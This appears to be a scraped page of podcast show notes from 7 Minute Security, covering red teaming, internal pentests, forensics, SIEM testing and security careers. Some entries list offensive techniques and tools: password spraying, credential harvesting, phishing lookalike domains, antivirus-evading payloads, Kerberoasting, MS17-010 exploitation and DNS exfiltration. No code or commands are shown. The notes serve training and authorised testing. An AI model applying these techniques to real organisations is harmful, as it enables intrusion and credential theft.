- What's an alternative to PowerShell tooling for internal pentesting? (hint: C# is the hotness)
- What certs/skills should I pursue to get better at red teaming (outside of "Hey, go build a lab!"). Some options:
- Red Team Security offers social engineering and Red Team Training
- Mandiant has Creative Red Team Training
- Specter Ops has several training options
- SANS offers SEC564: Red Team Operations and Threat Emulation
- Are customers happy to get assessed by a red team exercise, or do they do it begrudgingly because of requirements/regulations?
View this episode's show notes for more information
Published: Thursday, May 23, 2019
This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8 .This episode...
- My talk at Secure360 went really well. Only slightly #awkward thing is I felt an overwhelming need to change my title slide to talk about the fact that I don't drink.
- The 7MS User Group went really well. We'll resume in the late summer or early fall and do a session on lockpicking!
- Wednesday night my band had the honor of singing at a Minnesota LEMA service and wow...what an honor. To see the sea of officers and their supportive families and loved ones was incredibly powerful.
- MailSniper 's Invoke-DomainHarvestOWA helps you discover the FQDN of your mail server target. Invoke-UsernameHarvestOWA helps you figure out what username scheme your target is using. Invoke-PasswordSprayOWA helps you do a low and slow password spray to hopefully find some creds!
- Once inside the network, CrackMapExec is your friend. You can figure out where your compromised creds are valid across the network with this syntax:
View this episode's show notes for more information
Published: Wednesday, May 15, 2019
This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!Yuss! It's true! Dave and Ryan are back!Back in episode #326 we met Ryan...
- Who should have a red team exercise conducted? Who NEEDS one?
- How do you choose an objective that makes sense?
- What do you do about push-back from management and/or scope manipulation? (“Don’t phish our CEO! She’ll click stuff! Attack our servers, just not the production environment!!!”). Spoiler alert: your clients need to have intestinal fortitude!
- What’s better - a “zero knowledge” red team engagement or a collaborative exercise between testers and their clients?
- How do you attack a high-security bunker?!
- How do you conduct a red team exercise without ending up in jail? What does your “get out of jail” card get you - and NOT get you?
View this episode's show notes for more information
Published: Thursday, May 09, 2019
This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!Today I take a walk (literally!), get chased by a dog (seriously!) and talk about impostor syndrome and feelings of self-loathing and doubt as I...
- The thrill of getting a presentation accepted at a conference, and the dread and fear that follows
- The awful nightmare I have the night before I speak in front of others
- Shaking off nerves when your talk is accompanied by a sign language interpreter
- Finding your "voice" and getting the confidence to share/present your knowledge in a way only you can
- What are the telltale signs that you should start a security company?
- How do you find business when everybody and their mom seems to have a security offering?
- What are some of the tools/services/people that can help your business succeed?
View this episode's show notes for more information
Published: Friday, May 03, 2019
This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!Today we're talking about Logging Made Easy , a project that, as its name implies...makes logging easy! I love...
View this episode's show notes for more information
Published: Thursday, April 25, 2019
This episode of the 7 Minute Security podcast is brought to you by Netwrix. Netwrix Auditor empowers IT pros to detect, investigate and resolve critical issues before they stifle business activity, and proactively identify and mitigate misconfigurations in critical IT systems that could lead to...
- Find your most vulnerable AD abuse paths with BloodHound . For a two-part pentest tale showing how BloodHound can be used/abused by attackers, check out episodes 353 and 354 .
- Get a deep-dive look at your AD machines, users, shares, OS versions and more with Network Detective .
- De-escalate local admins (and prevent them from over-using/abusing the use of their privileged account)
- Although I haven't tested it yet, Logging Made Easy looks like an awesome and free way to get some entry-level logging setup in your environment. Can't wait for a good lab day to play!
View this episode's show notes for more information
Published: Friday, April 19, 2019
This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!In this episode I explore some ways you can turn up the security heat on your Windows workstations by mapping their security to a hardening...
- NIST STIG for Windows 10
- Heimdal Security - Windows 10 Hardening Guide
- Center for Internet Security's security benchmarks
- Windows Security Compliance Toolkit (SCT)
View this episode's show notes for more information
Published: Tuesday, April 16, 2019
This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!This week we're talking about everybody's favorite topic: REPORT WRITING! Yay! The peasants rejoice! In the last few months I've seen a lot of...
View this episode's show notes for more information
Published: Thursday, April 11, 2019
Today I'm launching an ongoing series called 7MOIST. It stands for:The wildest, craziest, nuttiest part of this series is that each episode will be 7 minutes long!I know, I know! You're saying, "Wait a sec, bub, isn't that why this podcast is called 7 Minute Security in the first place?" And yes,...
- 7
- Minutes
- of
- IT
- and
- Security
- Tips
View this episode's show notes for more information
Published: Wednesday, April 03, 2019
This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!In today's episode I talk about some cool tools you can use to start a hard drive forensics investigation more quickly. Resources talked about on...
- Forensics 101 - a talk I did for the 7MS user group in January
- The Digital Forensics Survival Podcast is a FANTASTIC resource to learn more about forensics
- CyLR works great to do quick live disk artifact-gathering on a suspect system, and then...
- CDQR can step in and analyze the info you gathered with CyLR and spit out helpful reports to begin your investigation
- YouTube video of the CyLR/CDQR creators demonstrating the tools and doing a live demo of artifact collection/analysis
- Did you miss this week's mousejacking Webinar ? Also, DIY $500 Pentest Lab - Part 2 is up on YouTube . And we've got a fun Webinar on MITRE ATT&CK coming up in May. Sign up here
View this episode's show notes for more information
Published: Wednesday, March 27, 2019
This episode is brought to you by Netwrix Auditor , which empowers IT pros to detect, investigate and resolve critical issues before they stifle business activity, and proactively identify and mitigate misconfigurations in critical IT systems that could...
- Mousejack.com - great demo video of the attack
- Crazy Radio PA - one hardware option to perform mousejacking attacks
- Custom mousejacking firmware for Crazy Radio PA
- Jackit - tool for conducting mousejack attacks
- A cool Twitter thread on using mousejacking for pentests
- Vulnerable devices - nice repository of devices known to be susceptible to mousejacking attacks
View this episode's show notes for more information
Published: Monday, March 25, 2019
Today's episode is the thrilling, exciting, heart-pounding conclusion of Tales of Internal Pentest Pwnage - Part 1 . In this episode, we cover the final "wins" that got me to Domain Admin status (and beyond!):We also talk about...
- Got DA but can't get to your final "crown jewels" destinations? How about going after the organization's backups (evil grin!)
- Got DA but stuck to find hot leads to where the crown jewels are? Get snoopy and go through people's files, folders and...bookmark caches! (evil grin #2!)
- If your nmap/eyewitness scan turns up Web sites with simply an IIS default landing page or "It works!" Apache page on it, there's probably more there than meets the eye.
View this episode's show notes for more information
Published: Friday, March 22, 2019
Buckle up! This is one of my favorite episodes.Today I'm kicking off a two-part series that walks you through a narrative of a recent internal pentest I worked on. I was able to get to Domain Admin status and see the "crown jewels" data, so I thought this would be a fun and informative narrative...
- Win 10 pro management box with Bitlocker drive encryption and Splashtop (not a sponsor) which I like because it offers 2FA and an additional per-machine password/PIN. I think I spent $100/year for it.
- Kali attack box with an encrypted drive (Kali makes this easy by offering you this option when you first install the OS).
- From the perimeter - where you do a lot of OSINT, phish key users, gain initial access, and then find a path to privilege from there.
- Assume compromise - assume that eventually someone will click a phishing link and give bad guys a foothold on the network, so you have the pentester bring in a Kali box, plug it into the network, and the test begins from that point.
View this episode's show notes for more information
Published: Thursday, March 14, 2019
I recently had the awesome opportunity to take the awesome Real World Red Team course put on by Peter Kim, author of [The Hacker Playbook](https://www.amazon.com/Hacker-Playbook-Practical-Penetration-...
- Doppelganger attacks - does your target have a frequently used site like mail.company.com? Try buying up mailcompany.com with a copy of their email portal (using Social Engineer Toolkit ), and the creds might come pouring in!
- Get potential usable creds from old breaches (Adobe, Ashley Madison, LinkedIn, Spotify)
- Password spraying is often really effective to get you your first set of creds - check out Spray or DomainPasswordSpray
- When creating phishing payloads, Veil will help you craft something to bypass AV
- When you're in a network and have grabbed your first set of creds, run BloodHound or SharpHound to map the Active Directory and find your high-value targets
- Check systems for MS17-010 for some potential easy wins
- Look for potential accounts that you can Kerberoast
- There may be opportunities to hide your payloads in code caves inside of applications that users run
- If you're popping shells, it's probably a good idea to script some of the actions so you can automate some recon and further exploitation
- In the Linux world, it's important to know some good privesc techniques
- It's also helpful to be able to use Tor and proxychains to evade detection
- Exfiltrate data using dnscat2 . I've got a down n' dirty write up on its use here
View this episode's show notes for more information
Published: Wednesday, March 06, 2019
Today's episode is brought to you by NoteCast . Try it free for 60 days (no credit card required) and enter code 7MS when completing your signup.In today's episode, I talk about how the level of Windows server/client logging out of the box is...not really awesome. I then...
View this episode's show notes for more information
Published: Wednesday, February 20, 2019
Today's featured interview is with Lewie Wilkinson, senior integration engineer at Pondurance . Pondurance helps customers improve their security posture by providing a managed threat hunting and response solution, including a 24/7 SOC. Lewie joined me via Skype to talk...
- Fundamentals of threat hunting
- What is threat hunting?
- What are the fundamentals to start mastering?
- How can someone start developing the core skills to get good at it?
- How can sysadmins/network admin, who have a busy enough time already just keeping the digital lights on, handle the mounting pressure to also shoulder security responsibilities as part of their job duties?
- What training/cert options are good to build skills in threat hunting?
- Lets say you know one of your users has clicked something icky and you suspect compromised machine/creds. You pull the machine off the network and rebuild it. How do you know that you've found/limited the extent of the damage?
- Are attackers on networks typically wiping logs on systems as the bounce around laterally?
- Anything to add to the low-hanging hacker fruit list?
- Why is it so critical to not just have logs, but have verbose logs with rich data you need in an investigation?
- When does it make sense to outsource some security responsibilities to a third party?
View this episode's show notes for more information
Published: Thursday, February 14, 2019
Today's featured interview is with Ameesh Divatia , cofounder and CEO at Baffle . Baffle offers an interesting approach to data protection that they call data-centric protection, and the idea is you need to protect information at the record...
- Data privacy - it seems like every 15 minutes there's yet another massive data breach. Why is this continuing to happen?
- What are the basic security/privacy fundamentals that companies should be doing but, for whatever reason, are not?
- GDPR
- What does GDPR mean to the average person?
- Why it was a data privacy wake-up call for so many?
- Have there been any sizable fines issued thus far?
- How can data that companies collect on us be processed in a way that doesn't compromise security?
View this episode's show notes for more information
Published: Wednesday, February 06, 2019
Today's episode is brought to you by my friends at safepass.me . Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is...
- I really dig the Apple family sharing controls, which let you do things like:
- Have the phone "sleep" at certain hours
- Limit the total amount of screen time per day
- Require you to authorize any apps that are downloaded
- We turned on OpenDNS to help filter inappropriate content.
- I also use UniFi access points, which allow you to create a separate wireless SSID with a voucher system enabled on it. That way, you can hand out vouchers to kids with a defined amount of access attached to it (like 1 hour or whatever you like). We use it as a reward once the kids' chores and homework is complete.
View this episode's show notes for more information
Published: Thursday, January 31, 2019
Today's episode is brought to you by my friends at safepass.me . Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is...
- My self-diagnosed job ADHD (check out my series on career guidance for the even longer version :-/)
- The history of 7MS the podcast (inspired by 10 minute podcast and particularly this episode about Arnold the love poet)
- How the podcast helped launch 7MS the business
- The various resources 7MS has worked on to help you in your IT/security career, such as: BPATTY - Brian's Pentesting and Technical Tips for You A Slack channel full of cool security people who want to help you learn, and learn from others as well Vulnerable VMs to help you practice hacking, such as Billy Madison and Tommy Boy Mastering Network Scanning with Kali Linux - a video course I created that's hosted by PacktPub
- BPATTY - Brian's Pentesting and Technical Tips for You
- A Slack channel full of cool security people who want to help you learn, and learn from others as well
- Vulnerable VMs to help you practice hacking, such as Billy Madison and Tommy Boy
- Mastering Network Scanning with Kali Linux - a video course I created that's hosted by PacktPub
View this episode's show notes for more information
Published: Thursday, January 24, 2019
WARNING: Today's episode is a bit of an experiment, and I hope you'll hang in there with me for it.I had the opportunity to do a week-long red team engagement, and so I recorded a little summary of the experience at the end of each day, and then pasted them all together to make today's...
View this episode's show notes for more information
Published: Wednesday, January 16, 2019
Coming up on Tuesday, January 22 I'll be doing a Webinar with Netwrix called [4 Ways Your Organization Can Be Hacked](https://try.netwrix.com/behind_scenes-4_ways_your_organization_can_be_hacked?utm_source=webinars&utm_medium=brian-johnson&utm_campaign=sm-link-behind-scenes-4-ways-your-...
- Would she rather fight 100 duck-sized horses, or 1 horse-sized ducks?
- What basic security effort could orgs address without investing a huge amount of dollars and effort?
- Would she rather be a giant hamster or a tiny rhinoceros?
View this episode's show notes for more information
Published: Wednesday, January 09, 2019
I'd like to coordially invite you to the first-ever 7MS User Group meeting, coming up Monday, January 14th at 6 p.m.! You can attend physically, virtually or both! All the info you need is below...see you there!
View this episode's show notes for more information
Published: Wednesday, January 02, 2019
Psssst! Wanna come to the first ever 7MS User Group meeting? It's coming up on January 14th. You can join in person or virtually! Head here for more information!Dan DeCloss (a.k.a. wh33lhouse on Slack and @PlexTracFTW...
- How to bleed "purple" and get comfortable playing on both the attacking and defending side of the house
- What areas are we failing in defending our networks - and what kind of things can we do make our networks more resilient?!
- What's the biggest challenge you see on both the blue and red team side (spoiler alert: communication is super important!)?
- How do you break into a cyber security position that requires X years of experience when you have zero experience (Dan offers a great tip: don't be intimidated by requirements on job postings...they're often excessive/unreasonable)
- Ways to show security aptitude on your resume without necessarily having a bunch of experience:Build a home labCreate a blogBug bountiesMake a podcastGet certs (or at least get enrolled in them)
- Build a home lab
- Create a blog
- Bug bounties
- Make a podcast
- Get certs (or at least get enrolled in them)
- Some history on PlexTrac and what inspired Dan to create it
View this episode's show notes for more information
Published: Thursday, December 27, 2018
Matt McCullough (a.k.a. Matty McFly on Slack ) joined me in the studio to talk about his wild and crazy path to security. He started literally with no technical experience, but through a lot of hard work, aggressive networking and taking advantage of educational and career...
- How to start an IT career as "the family IT guy"
- Leveraging a higher education (at places like Lake Superior College to meet people of influence and start networking like a beast
- Entry level sysadmin and helpdesk jobs are fun - great opportunities to make the most of the position, build your skills and stretch yourself outside your comfort zone
- MSPs (Managed Service Providers) are another great way to see different clients/verticals/systems and the various requirements that go into supporting them. From there, look for opportunities to start securing those organizations, as many MSPs don't dabble heavily into the security realm.
- If you're going to school for cybersecurity training, look for ways to leverage your status to get discounts on security training, such as with SANS
- Competitions like CCDC are awesome. You're given a handful of servers that are full of vulnerabilities, and you essentially are tasked with defending a network against a professional group of pentesters/redteamers. You even have to deal with real-life "injections" (other random emergencies and mock customers to deal with) while you're in the thick of the battle!
- Join local cyber clubs (or start your own)! Looking for a fun CTF to get started in a group setting? Try hacking the OWASP Juice Shop
- Attend security conferences(or start your own)!
- Looking for a sweet place to go to camp this summer? Try GenCyber and the LSC summer camps - it's cheap and awesome, plus for a limited registration fee you get a ton of training and sometimes free gear!
- Not sure if you're hardcore to try CCDC right now, warm up your skills at the National Cyber League with some CTFs
- Looking for a great cyber group to join that has chapters just about everywhere? Try ISSA !
- BSides are another great place to connect with the security community without the heavier commitment/involvement of some of the larger conferences
- Secure360 is a MN-based security conference that has a student-focused version called Student360
- Getting a cybersecurity education is great. Getting some money off tuition is even better! Be sure to ask at school to see what grants and scholarships might be available to save you a few bucks. Some government scholarship opportunities like Scholarship for Service might even pay for you to go to school full time! Check out the NSF S-STEM scholarship as well.
- Certifications tend to polarize the security community, but I think we can almost all agree that having some is better than none. If you're just getting started, Security+ is a great first notch on your belt, as is CySA . When you get a bit more experience, check out the CISSP as it's stapled to a lot of security job application requirements. If you want to get started in ethical hacking, we've heard the newest version of the CEH is a good place to start. When you're ready for a heftier challenge, try OSCP .
- Build a home lab to play with security tools and techniques! I've covered this before in a podcast series: part 1 , part 2 and part 3
View this episode's show notes for more information
Published: Wednesday, December 19, 2018
Today's episode is brought to you by my friends at safepass.me . Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is...
View this episode's show notes for more information
Published: Thursday, December 13, 2018
Last week I had the fun privilege of speaking twice at the Minnesota Goverment IT Symposium on the following topics:Also, check out the Digital Forensics Survival Podcast which is awesome for learning more about...
- Forensics 101: This was a "reloaded" talk that I started earlier this year (and covered in episode 299 and 300 ). At a high level, the talk covered:Hunting malware with Sysinternals Creating system images with FTKImager Dumping memory with Volatility and ripping icky stuff out of memory images with their 1-2-3 punch articleSeeking out DNS tunneling/exfil using Security Onion
- Hunting malware with Sysinternals
- Creating system images with FTKImager
- Dumping memory with Volatility and ripping icky stuff out of memory images with their 1-2-3 punch article
- Seeking out DNS tunneling/exfil using Security Onion
- Pecha Kucha: this talk, which is in a 20x20 format is part PSA about how to not click bad links, part cautionary tale (and music video!) about how the promise of a free burrito can ruin your business! Check out the video here , and special thanks to Joe Klein for providing the awesome pics to go along with the storyboard - you're a champ.
View this episode's show notes for more information
Published: Thursday, December 06, 2018
On a recent security assessment I was thrown for a loop and given the opportunity to do a two-part physical pentest/SE exercise - with about 5 minutes notice(!). Yes, it had me pooping my pants, but in retrospect it was an amazing experience. This is the mission I was given:Was I successful? Was...
- See if you can get the front desk staff to plug in a USB drive - I posed as John Strand and armed myself with a fake resume. And as I approached the front desk I suddenly panicked and thought, "What if the front desk person is a BHIS fan?!?!?"
- Break into a door with weak security and steal equipment - I was given a plastic shiv and asked to try and get into a secure area in the middle of a busy office morning. No pressure, right?
View this episode's show notes for more information
Published: Wednesday, November 28, 2018
Today's episode talks about some SIEMple tests you can run on your SIEM (OMg see what I did there? I took the word simple and made it SIEMple. Genius stuff, right? And there's no extra charge for it!). And if you're just now starting to shop around for a SIEM, this episode also has an extensive...
- Questionnaire - a series of questions you can ask SIEM vendors to gather as many data points about their products and services as possible
- SIEM tests - a few tests you can conduct on your internal/external network to see if your SIEM solution indeed coughs up alerts
View this episode's show notes for more information
Published: Wednesday, November 21, 2018
Happy Thanksgiving! In this episode I:Hope you can take some time off and enjoy your friends/family this week and weekend. Have a blessed Thanksgiving!.
- Share some things I'm thankful for - like you!
- Talk about a fun episode I'm working on that has some SIEMple tests you can use to test your SIEM (omg see what I did there? So clever)
- Announce the 7MS user's group that will start meeting in the south metro area of Minnesota in January of 2019!
- Tell you a story about a kid that peed his pants in front of me (you're welcome in advance)
View this episode's show notes for more information
Published: Wednesday, November 14, 2018
Welcome to part 6 of our miniseries all about the ups, downs, trials and tribulations of being a small, one-person security start up. In this episode I detail out all the software/services I use to run 7 Minute Security, LLC in hopes it might help you run your company as well! I started a new...
View this episode's show notes for more information
Published: Thursday, November 08, 2018
Today I'm excited to brain-dump a bunch of cool stuff I learned at a red team conference called ArcticCon this week. Although this conference observes the Chatham house rule I'm just going to talk about a few things from...
- When you red team an org, do you usually assume compromise (i.e. plug a Kali box into the network and go from there) or are you crafting email payloads from scratch, trying to get a reverse shell past various email/firewall filtering efforts?
- Does your management seem to "get it" when it comes to the true value of having a red team? Or do they put limits on your efforts - like "Wait a sec, don't phish my boss!" Or "OMG hold on, don't pwn those systems!"
View this episode's show notes for more information
Published: Thursday, November 01, 2018
This week I got to celebrate Halloween with my friends at Netwrix by co-hosting a Webinar called IT Security Horrors That Keep You Up at Night. The content was a modified version of the Blue Team on a Budget talk I've been doing the past year or so, and...
- Phishing
- Abusing bad domain passwords
- Abusing bad local admin passwords
- Responder attack
- Lack of SMB signing
- Get your slides done early! - when co-presenting, it makes sense that they want to see your slides sooner than the day of! :-)
- Don't freak out about an audience of "none" - I always think Webinars are weird because you can't see people's faces or interpret their body language to get a feel for whether they appreciate your humor or understand the points you're trying to make. I learned you just gotta keep pushing forward "blind" whether you like it or not.
- Setup a redundant presentation system - ok so file this one with the irrational fears dept, but I actually had a second laptop ready with my presentation loaded, and the laptop was connected to a cell hotspot I setup on a tablet. That way if my machine BSOD'd or Internet went out in my house, I could quickly rejoin the presentation and pick up where I left off. Safe or psycho? You decide!
View this episode's show notes for more information
Published: Friday, October 26, 2018
This week I was in lovely Boise, Idaho doing some security assessment work. While I was there I got to hang out with Paul Wilch and some of the Project7 crew and picked up a lot of cool tools and tips I share in today's episode:.
- The Badger Infosec group did a cool Rubber Ducky demo.
- Dan from DDSec did a demo of PlexTrac which is "the last cybersecurity reporting tool you will ever need." I'm actually going to use PlexTrac for my next few assessments and am working to line up a future interview with Dan to learn even more.
- Paul gave a demo of Parrot which is cool and Kali-like. However, when Paul and I did a side-by-side test with Kali, we noticed that Parrot kind of barfed when it set out to do an Eyewitness report.
- After meeting Paul's son, Simon, I'm optimistic about the future IT/security leaders in this country. There are some wicked-smart youth out there!
- Paul gave me a hotel keycard lockpick/shiv (his own creation!) and staged a few doors for me to try and bypass. He made it interesting when he promised to throat-punch me if I failed! Here's a picture of the pick (and thankfully, I got off without any throat punches):
View this episode's show notes for more information
Published: Wednesday, October 17, 2018
In this episode I'm releasing a new document aimed to help organizations eliminate low hanging hacker fruit from the environment. The document contains (relatively) cheap and (relatively) easy things to implement. And my hope is it can be a living/breathing document that will bulk up over time....
View this episode's show notes for more information
Published: Wednesday, October 10, 2018
It's done! It's done!! It's DONE!!!That's right mom, my PacktPub course called Mastering Kali Linux Network Scanning is done!In today's episode I:With the holidays coming up, this course is a perfect...
- Recap the course authoring experience
- Explain my super anal retentive editing process that takes 4 hours for every 10 minutes of produced video
- Admit some last minute mistakes that about made me quit the whole project
View this episode's show notes for more information
Published: Wednesday, October 03, 2018
In today's episode, I'm excited to be joined in the studio by Nathan Hunstad , Director of Security at Code42 . Nathan and I had a great chat about Code42's new security offering called [Code42 Forensic File...
- "Does known malware have, or has it ever had, a foothold in our environment?"
- "Has a particular crypto-mining agent been installed on our employees’ computers? Who has it now?"
- "What endpoints have or had copies of our company’s most sensitive files?"
- "What files did an employee download or delete in the months before resigning?"
- "What non-sanctioned collaboration applications are present in our environment?"
- Implementing host-based firewalls - here's a great blog and video on it
View this episode's show notes for more information
Published: Thursday, September 27, 2018
Today's episode is brought to you by my friends at Netwrix. Their amazing Netwrix Auditor tool gives you visibility into what’s happening both on your local network and cloud-based IT systems and tells you about critical changes, and when and where people have been accessing data. Give it a spin...
View this episode's show notes for more information
Published: Wednesday, September 19, 2018
This episode is a cavalcade of fun! Why?First, I've got a big announcement: I've accepted a new position."What?!" exclaimed my mom. "I thought you were president of 7MS, what the what?"No worries, it's business as usual, and my responsibilities at 7MS aren't changing. But I'm also going to start...
View this episode's show notes for more information
Published: Thursday, September 13, 2018
Today's episode is brought to you by my friends at Netwrix. Their amazing Netwrix Auditor tool gives you visibility into what’s happening both on your local network and cloud-based IT systems and tells you about critical changes, and when and where people have been accessing data. Give it a spin...
- What are the security fundamentals companies still aren't getting right?
- How do I properly implement a software firewall?
- How do I not get sued by security product vendors?
- Is there a good way to identify C2 traffic on my network?
- What should I do - and not do - when giving a security Webinar?
- I'm a post-OSCP grad - what else should I take to dive further down the pentest rabbit hole?
- I'm in a network/sysadmin role right now. How can I break into a security-focused role?
- Is there an update out yet for the Active Defense Harbinger Distribution ?
- Kansa - a PowerShell incident response framework
- Implementing host-based firewalls - here's a great blog and video on it
- RITA - Real Intelligence Threat Analytics
View this episode's show notes for more information
Published: Thursday, September 06, 2018
Today's episode is brought to you by my friends at Dashlane, a fantastic password manager for you, your family and your business! Head to www.dashlane.com/7ms and use the code 7MS for 10% off a year of Dashlane Premium (offer does not include Premium Plus)!Today...
- The definition of "red teaming" and where it overlaps, if at all, with pentesting
- Successfully running red team campaigns
- Defending against a red team campaign
- How to climb unclimbable walls
- Is antivirus any good at stopping attackers?
- The importance of 2FA and training your end-users
- How to fool the "This email originated outside your organization" email banners
- How to break into red teaming as a career
- How to successfully break into a casino (or not)
- RedTeam Security's awesome YouTube video on breaking into the US power grid
- If you're a red teamer and in the Twin Cities area (or willing to drive a bit), you definitely want to sign up for ArcticCon coming up on October 23-24 at the Optum World Headquarters. Head to the link and sign up - if there are seats left!
View this episode's show notes for more information
Published: Thursday, August 30, 2018
Today's episode is a follow-up to #304 where we talked about how you can integrate over 500 million weak/breached/leaked passwords form Troy Hunt's [Pwned Passwords](https://www.troyhunt.com/pwned-passwords-v3-is-now-...
- If users update their password to something on the Pwned Passwords list, they'll see the generic "Your password didn't meet policy requirements" message. In other words, the message they'll see is no different than when they pick a password that doesn't meet the default domain policy. So be careful! I'd recommend training the users ahead of pulling the trigger on Pwned Passwords.
- If you want to take, for example, just the top 100 words off of Troy's list and start your implementation off with a small list with:
- As it relates to "hard coding" a machine to point to a specific domain controller, this site has the technique I used. Is there a better way?
View this episode's show notes for more information
Published: Thursday, August 23, 2018
It's been a while so I thought I'd update you on how things are going on the business front. Here are the big updates I want to share with you in today's episode:Lots of goodies to share today!.
- A new 7MS hire that's going to hunt sales opportunities!
- My approach to finding podcast sponsors (it seems to be working)
- Some kick-butt interviews that are on the horizon (including the one and only JOHN STRAND !)
View this episode's show notes for more information
Published: Thursday, August 16, 2018
Today's episode is about a general security awareness session I'm putting together, and it's aimed at helping individuals and businesses not get hacked. To play off the lucky number 7, I'm trying to broil this list down to 7 key things to focus on. Here's my list thus far:Passwords2FA/MFAWifi...
View this episode's show notes for more information
Published: Friday, August 10, 2018
I had an exhilarating and terrifying experience this week doing my first ever live radio interview!As a quick bit of background, this interview was part of the 7MS radio marketing campaign that I've talked about my "How to Succeed in Business Without Really Crying" series (here's part...
View this episode's show notes for more information
Published: Wednesday, August 01, 2018
Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.Today's episode is a follow-up interview with Joe Klein, who is my good pal, a former...
- How to be an absolute beast at networking
- Seizing new opportunities (even if it seems scary)
- Good certs for security newbs (and not-so-newbs) to pursue
- Life as a SOC analyst
- How to learn security by teaching it!
- 07:21: Interview begins(!)
- 08:00: Recap of what we talked about during Joe's first interview
- 12:42: What kind of skills/certs should someone pursue to get an entry level SOC analyst position? And is SOC analyst the "go to" position infosec newbs?
- 16:00: What can someone new to the infosec community do to network with others if their current LinkedIn network is pretty slim?
- 24:55: What are some good certs to get while I'm waiting to qualify for the CISSP? (This part of the podcast is NOT brought to you by Starbucks, but we wish it was)
- Insert banter about listening to podcasts at 2x
- 29:00: Actually answer the question, "What are some good certs to get while I'm waiting to qualify for the CISSP?"
- 32:00: Rage against tests that don't let you go back to review your answers! And how to be ok with failing certs.
- 37:47: How to successfully prepare for a computerized exam
- 43:29: What's it really like to be on the SOC? Is it just like watching an episode of 24?
- 47:00: Joe spots Rick from Walking Dead on my desk.
- 48:00: Brian reveals a major spoiler about Walking Dead season 9.
- 48:30: Joe scolds Brian for not letting people prepare for the spoiler.
- 49:12: Brian hated Carl, and hoped for seasons and seasons that he would get bit on the face.
- 50:47: Joe notices more toys on Brian's desk.
- 51:08: Brian removes all of Wolverine's limbs.
- 51:40: A commercial for water(?)
- 51:58: Joe thinks Brian should perhaps do voiceovers for theater trailers.
- 52:39: Joe describes what a tier 1 SOC analyst does.
- 55:35: The importance of setting up a home lab to test tools/tricks/scripts/techniques in a safe environment (and the correct pronounciation of the word "dude")
- 58:00: Are the tools a SOC uses totally proprietary / black magic / super secret / don't-ask-don't-tell kind of stuff?
- 1:03:00: What does a tier 2 SOC analyst do in their daily work?
- 1:05:00: Joe talks about his life as an adjunct professor (ok not really...but dude...he teaches impressionible young college minds!)
- 1:06:34: But first...this message from our lovely sponsor, ITProTV
- 1:10:30: Ok now we seriously are going to talk about Joe's life as an adjunct professor.
- 1:11:20: Joe notices Brian is typing on his computer, and he does not appreciate it.
- 1:11:45: Joe and Brian's wives wonder where they are.
- 1:13:00: Joe really, really talks about becoming a teacher
- 1:17:25: Joe breaks Brian's toy Freddy Krueger, and the interview is over, as is their friendship.
- 1:20:00: Joe resumes talking about teaching.
- 1:22:35: Brian gives Joe a chance to redeem himself by allowing him to hold "cord-holding Batman." Brian and Joe do bad Batman imitations.
- 1:23:42: Brian starts to ask a question but both he and Joe start doing bad Arnold impersonations instead.
- 1:25:37: Brian asks if Joe is a better SOC analyst because of his experience in a professorial role.
- 1:28:24: The guys talk about the importance of communication - not only in IT/security, but everything you do.
- 1:32:36: The interview is almost over, but Brian remembers he hasn't engaged Joe in a brand new 7MS studios tradition called "7 Random Questions with 7 Minute Security." (but Brian only has 5 questions prepared. Actually, he only has 4. What an idiot.)
- 1:38:30: Joe and Brian are joined by Mrs. 7 Minute Security!
- 1:41:15: Brian asks Joe the final question of the interview. A question that could change the very course of Joe's life.
View this episode's show notes for more information
Published: Wednesday, July 25, 2018
Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.This week I sat down with Lane Roush of Arctic Wolf to...
- What in the world is going on in my network?
- How will I know if bad stuff is happening?
- If I do identify the bad stuff and attempt to eradicate it, how will I know if I've exorcised all the demons?
- Why is it so hard to separate the signal from noise when trying to figure out what's happening in the bowels of your network?
- Should logging/alerting be a full-time job for one or more people?
- When does it make sense to outsource these responsibilities?
View this episode's show notes for more information
Published: Friday, July 20, 2018
Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.In today's episode, I talk about my fun experience using the...
View this episode's show notes for more information
Published: Wednesday, July 11, 2018
Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.This week's show is another interview episode - this time with my pal Bjorn Kimminich...
- How the Juice Shop came to be
- The current status of application security (is it getting any better?!)
- Common vulnerabilities still found in today's Web apps
- Juice Shop being featured in Google's Summer of Code
- How dev teams can better bake security into their products
- What's next for the Juice Shop (hint: stay tuned after the episode is over for a hint on one new " feature ")
View this episode's show notes for more information
Published: Thursday, July 05, 2018
Today's interview features Justin McCarthy, CTO and cofounder of StrongDM , which offers both commercial and open source tools (like Comply ) to help customers with SOC compliance.Justin schooled me (in a nice way) about a lot of...
- What SOC and the various SOC types are all about
- What SOC compliance costs
- What to look for in selecting a good auditor
- Tools that can help companies make SOC compliance efforts go more smoothly
View this episode's show notes for more information
Published: Thursday, June 28, 2018
In this episode I wanted to give you some cool/fun updates as it relates to 7MS the business! Specifically:.
- A new member of the 7MS team (kinda!)
- The weird and varied projects I'm working on
- Upcoming podcast sponsors (probably in July)
- 7MS has a "real" office coming soon to the southern metro of MN (hopefully!)
View this episode's show notes for more information
Published: Thursday, June 21, 2018
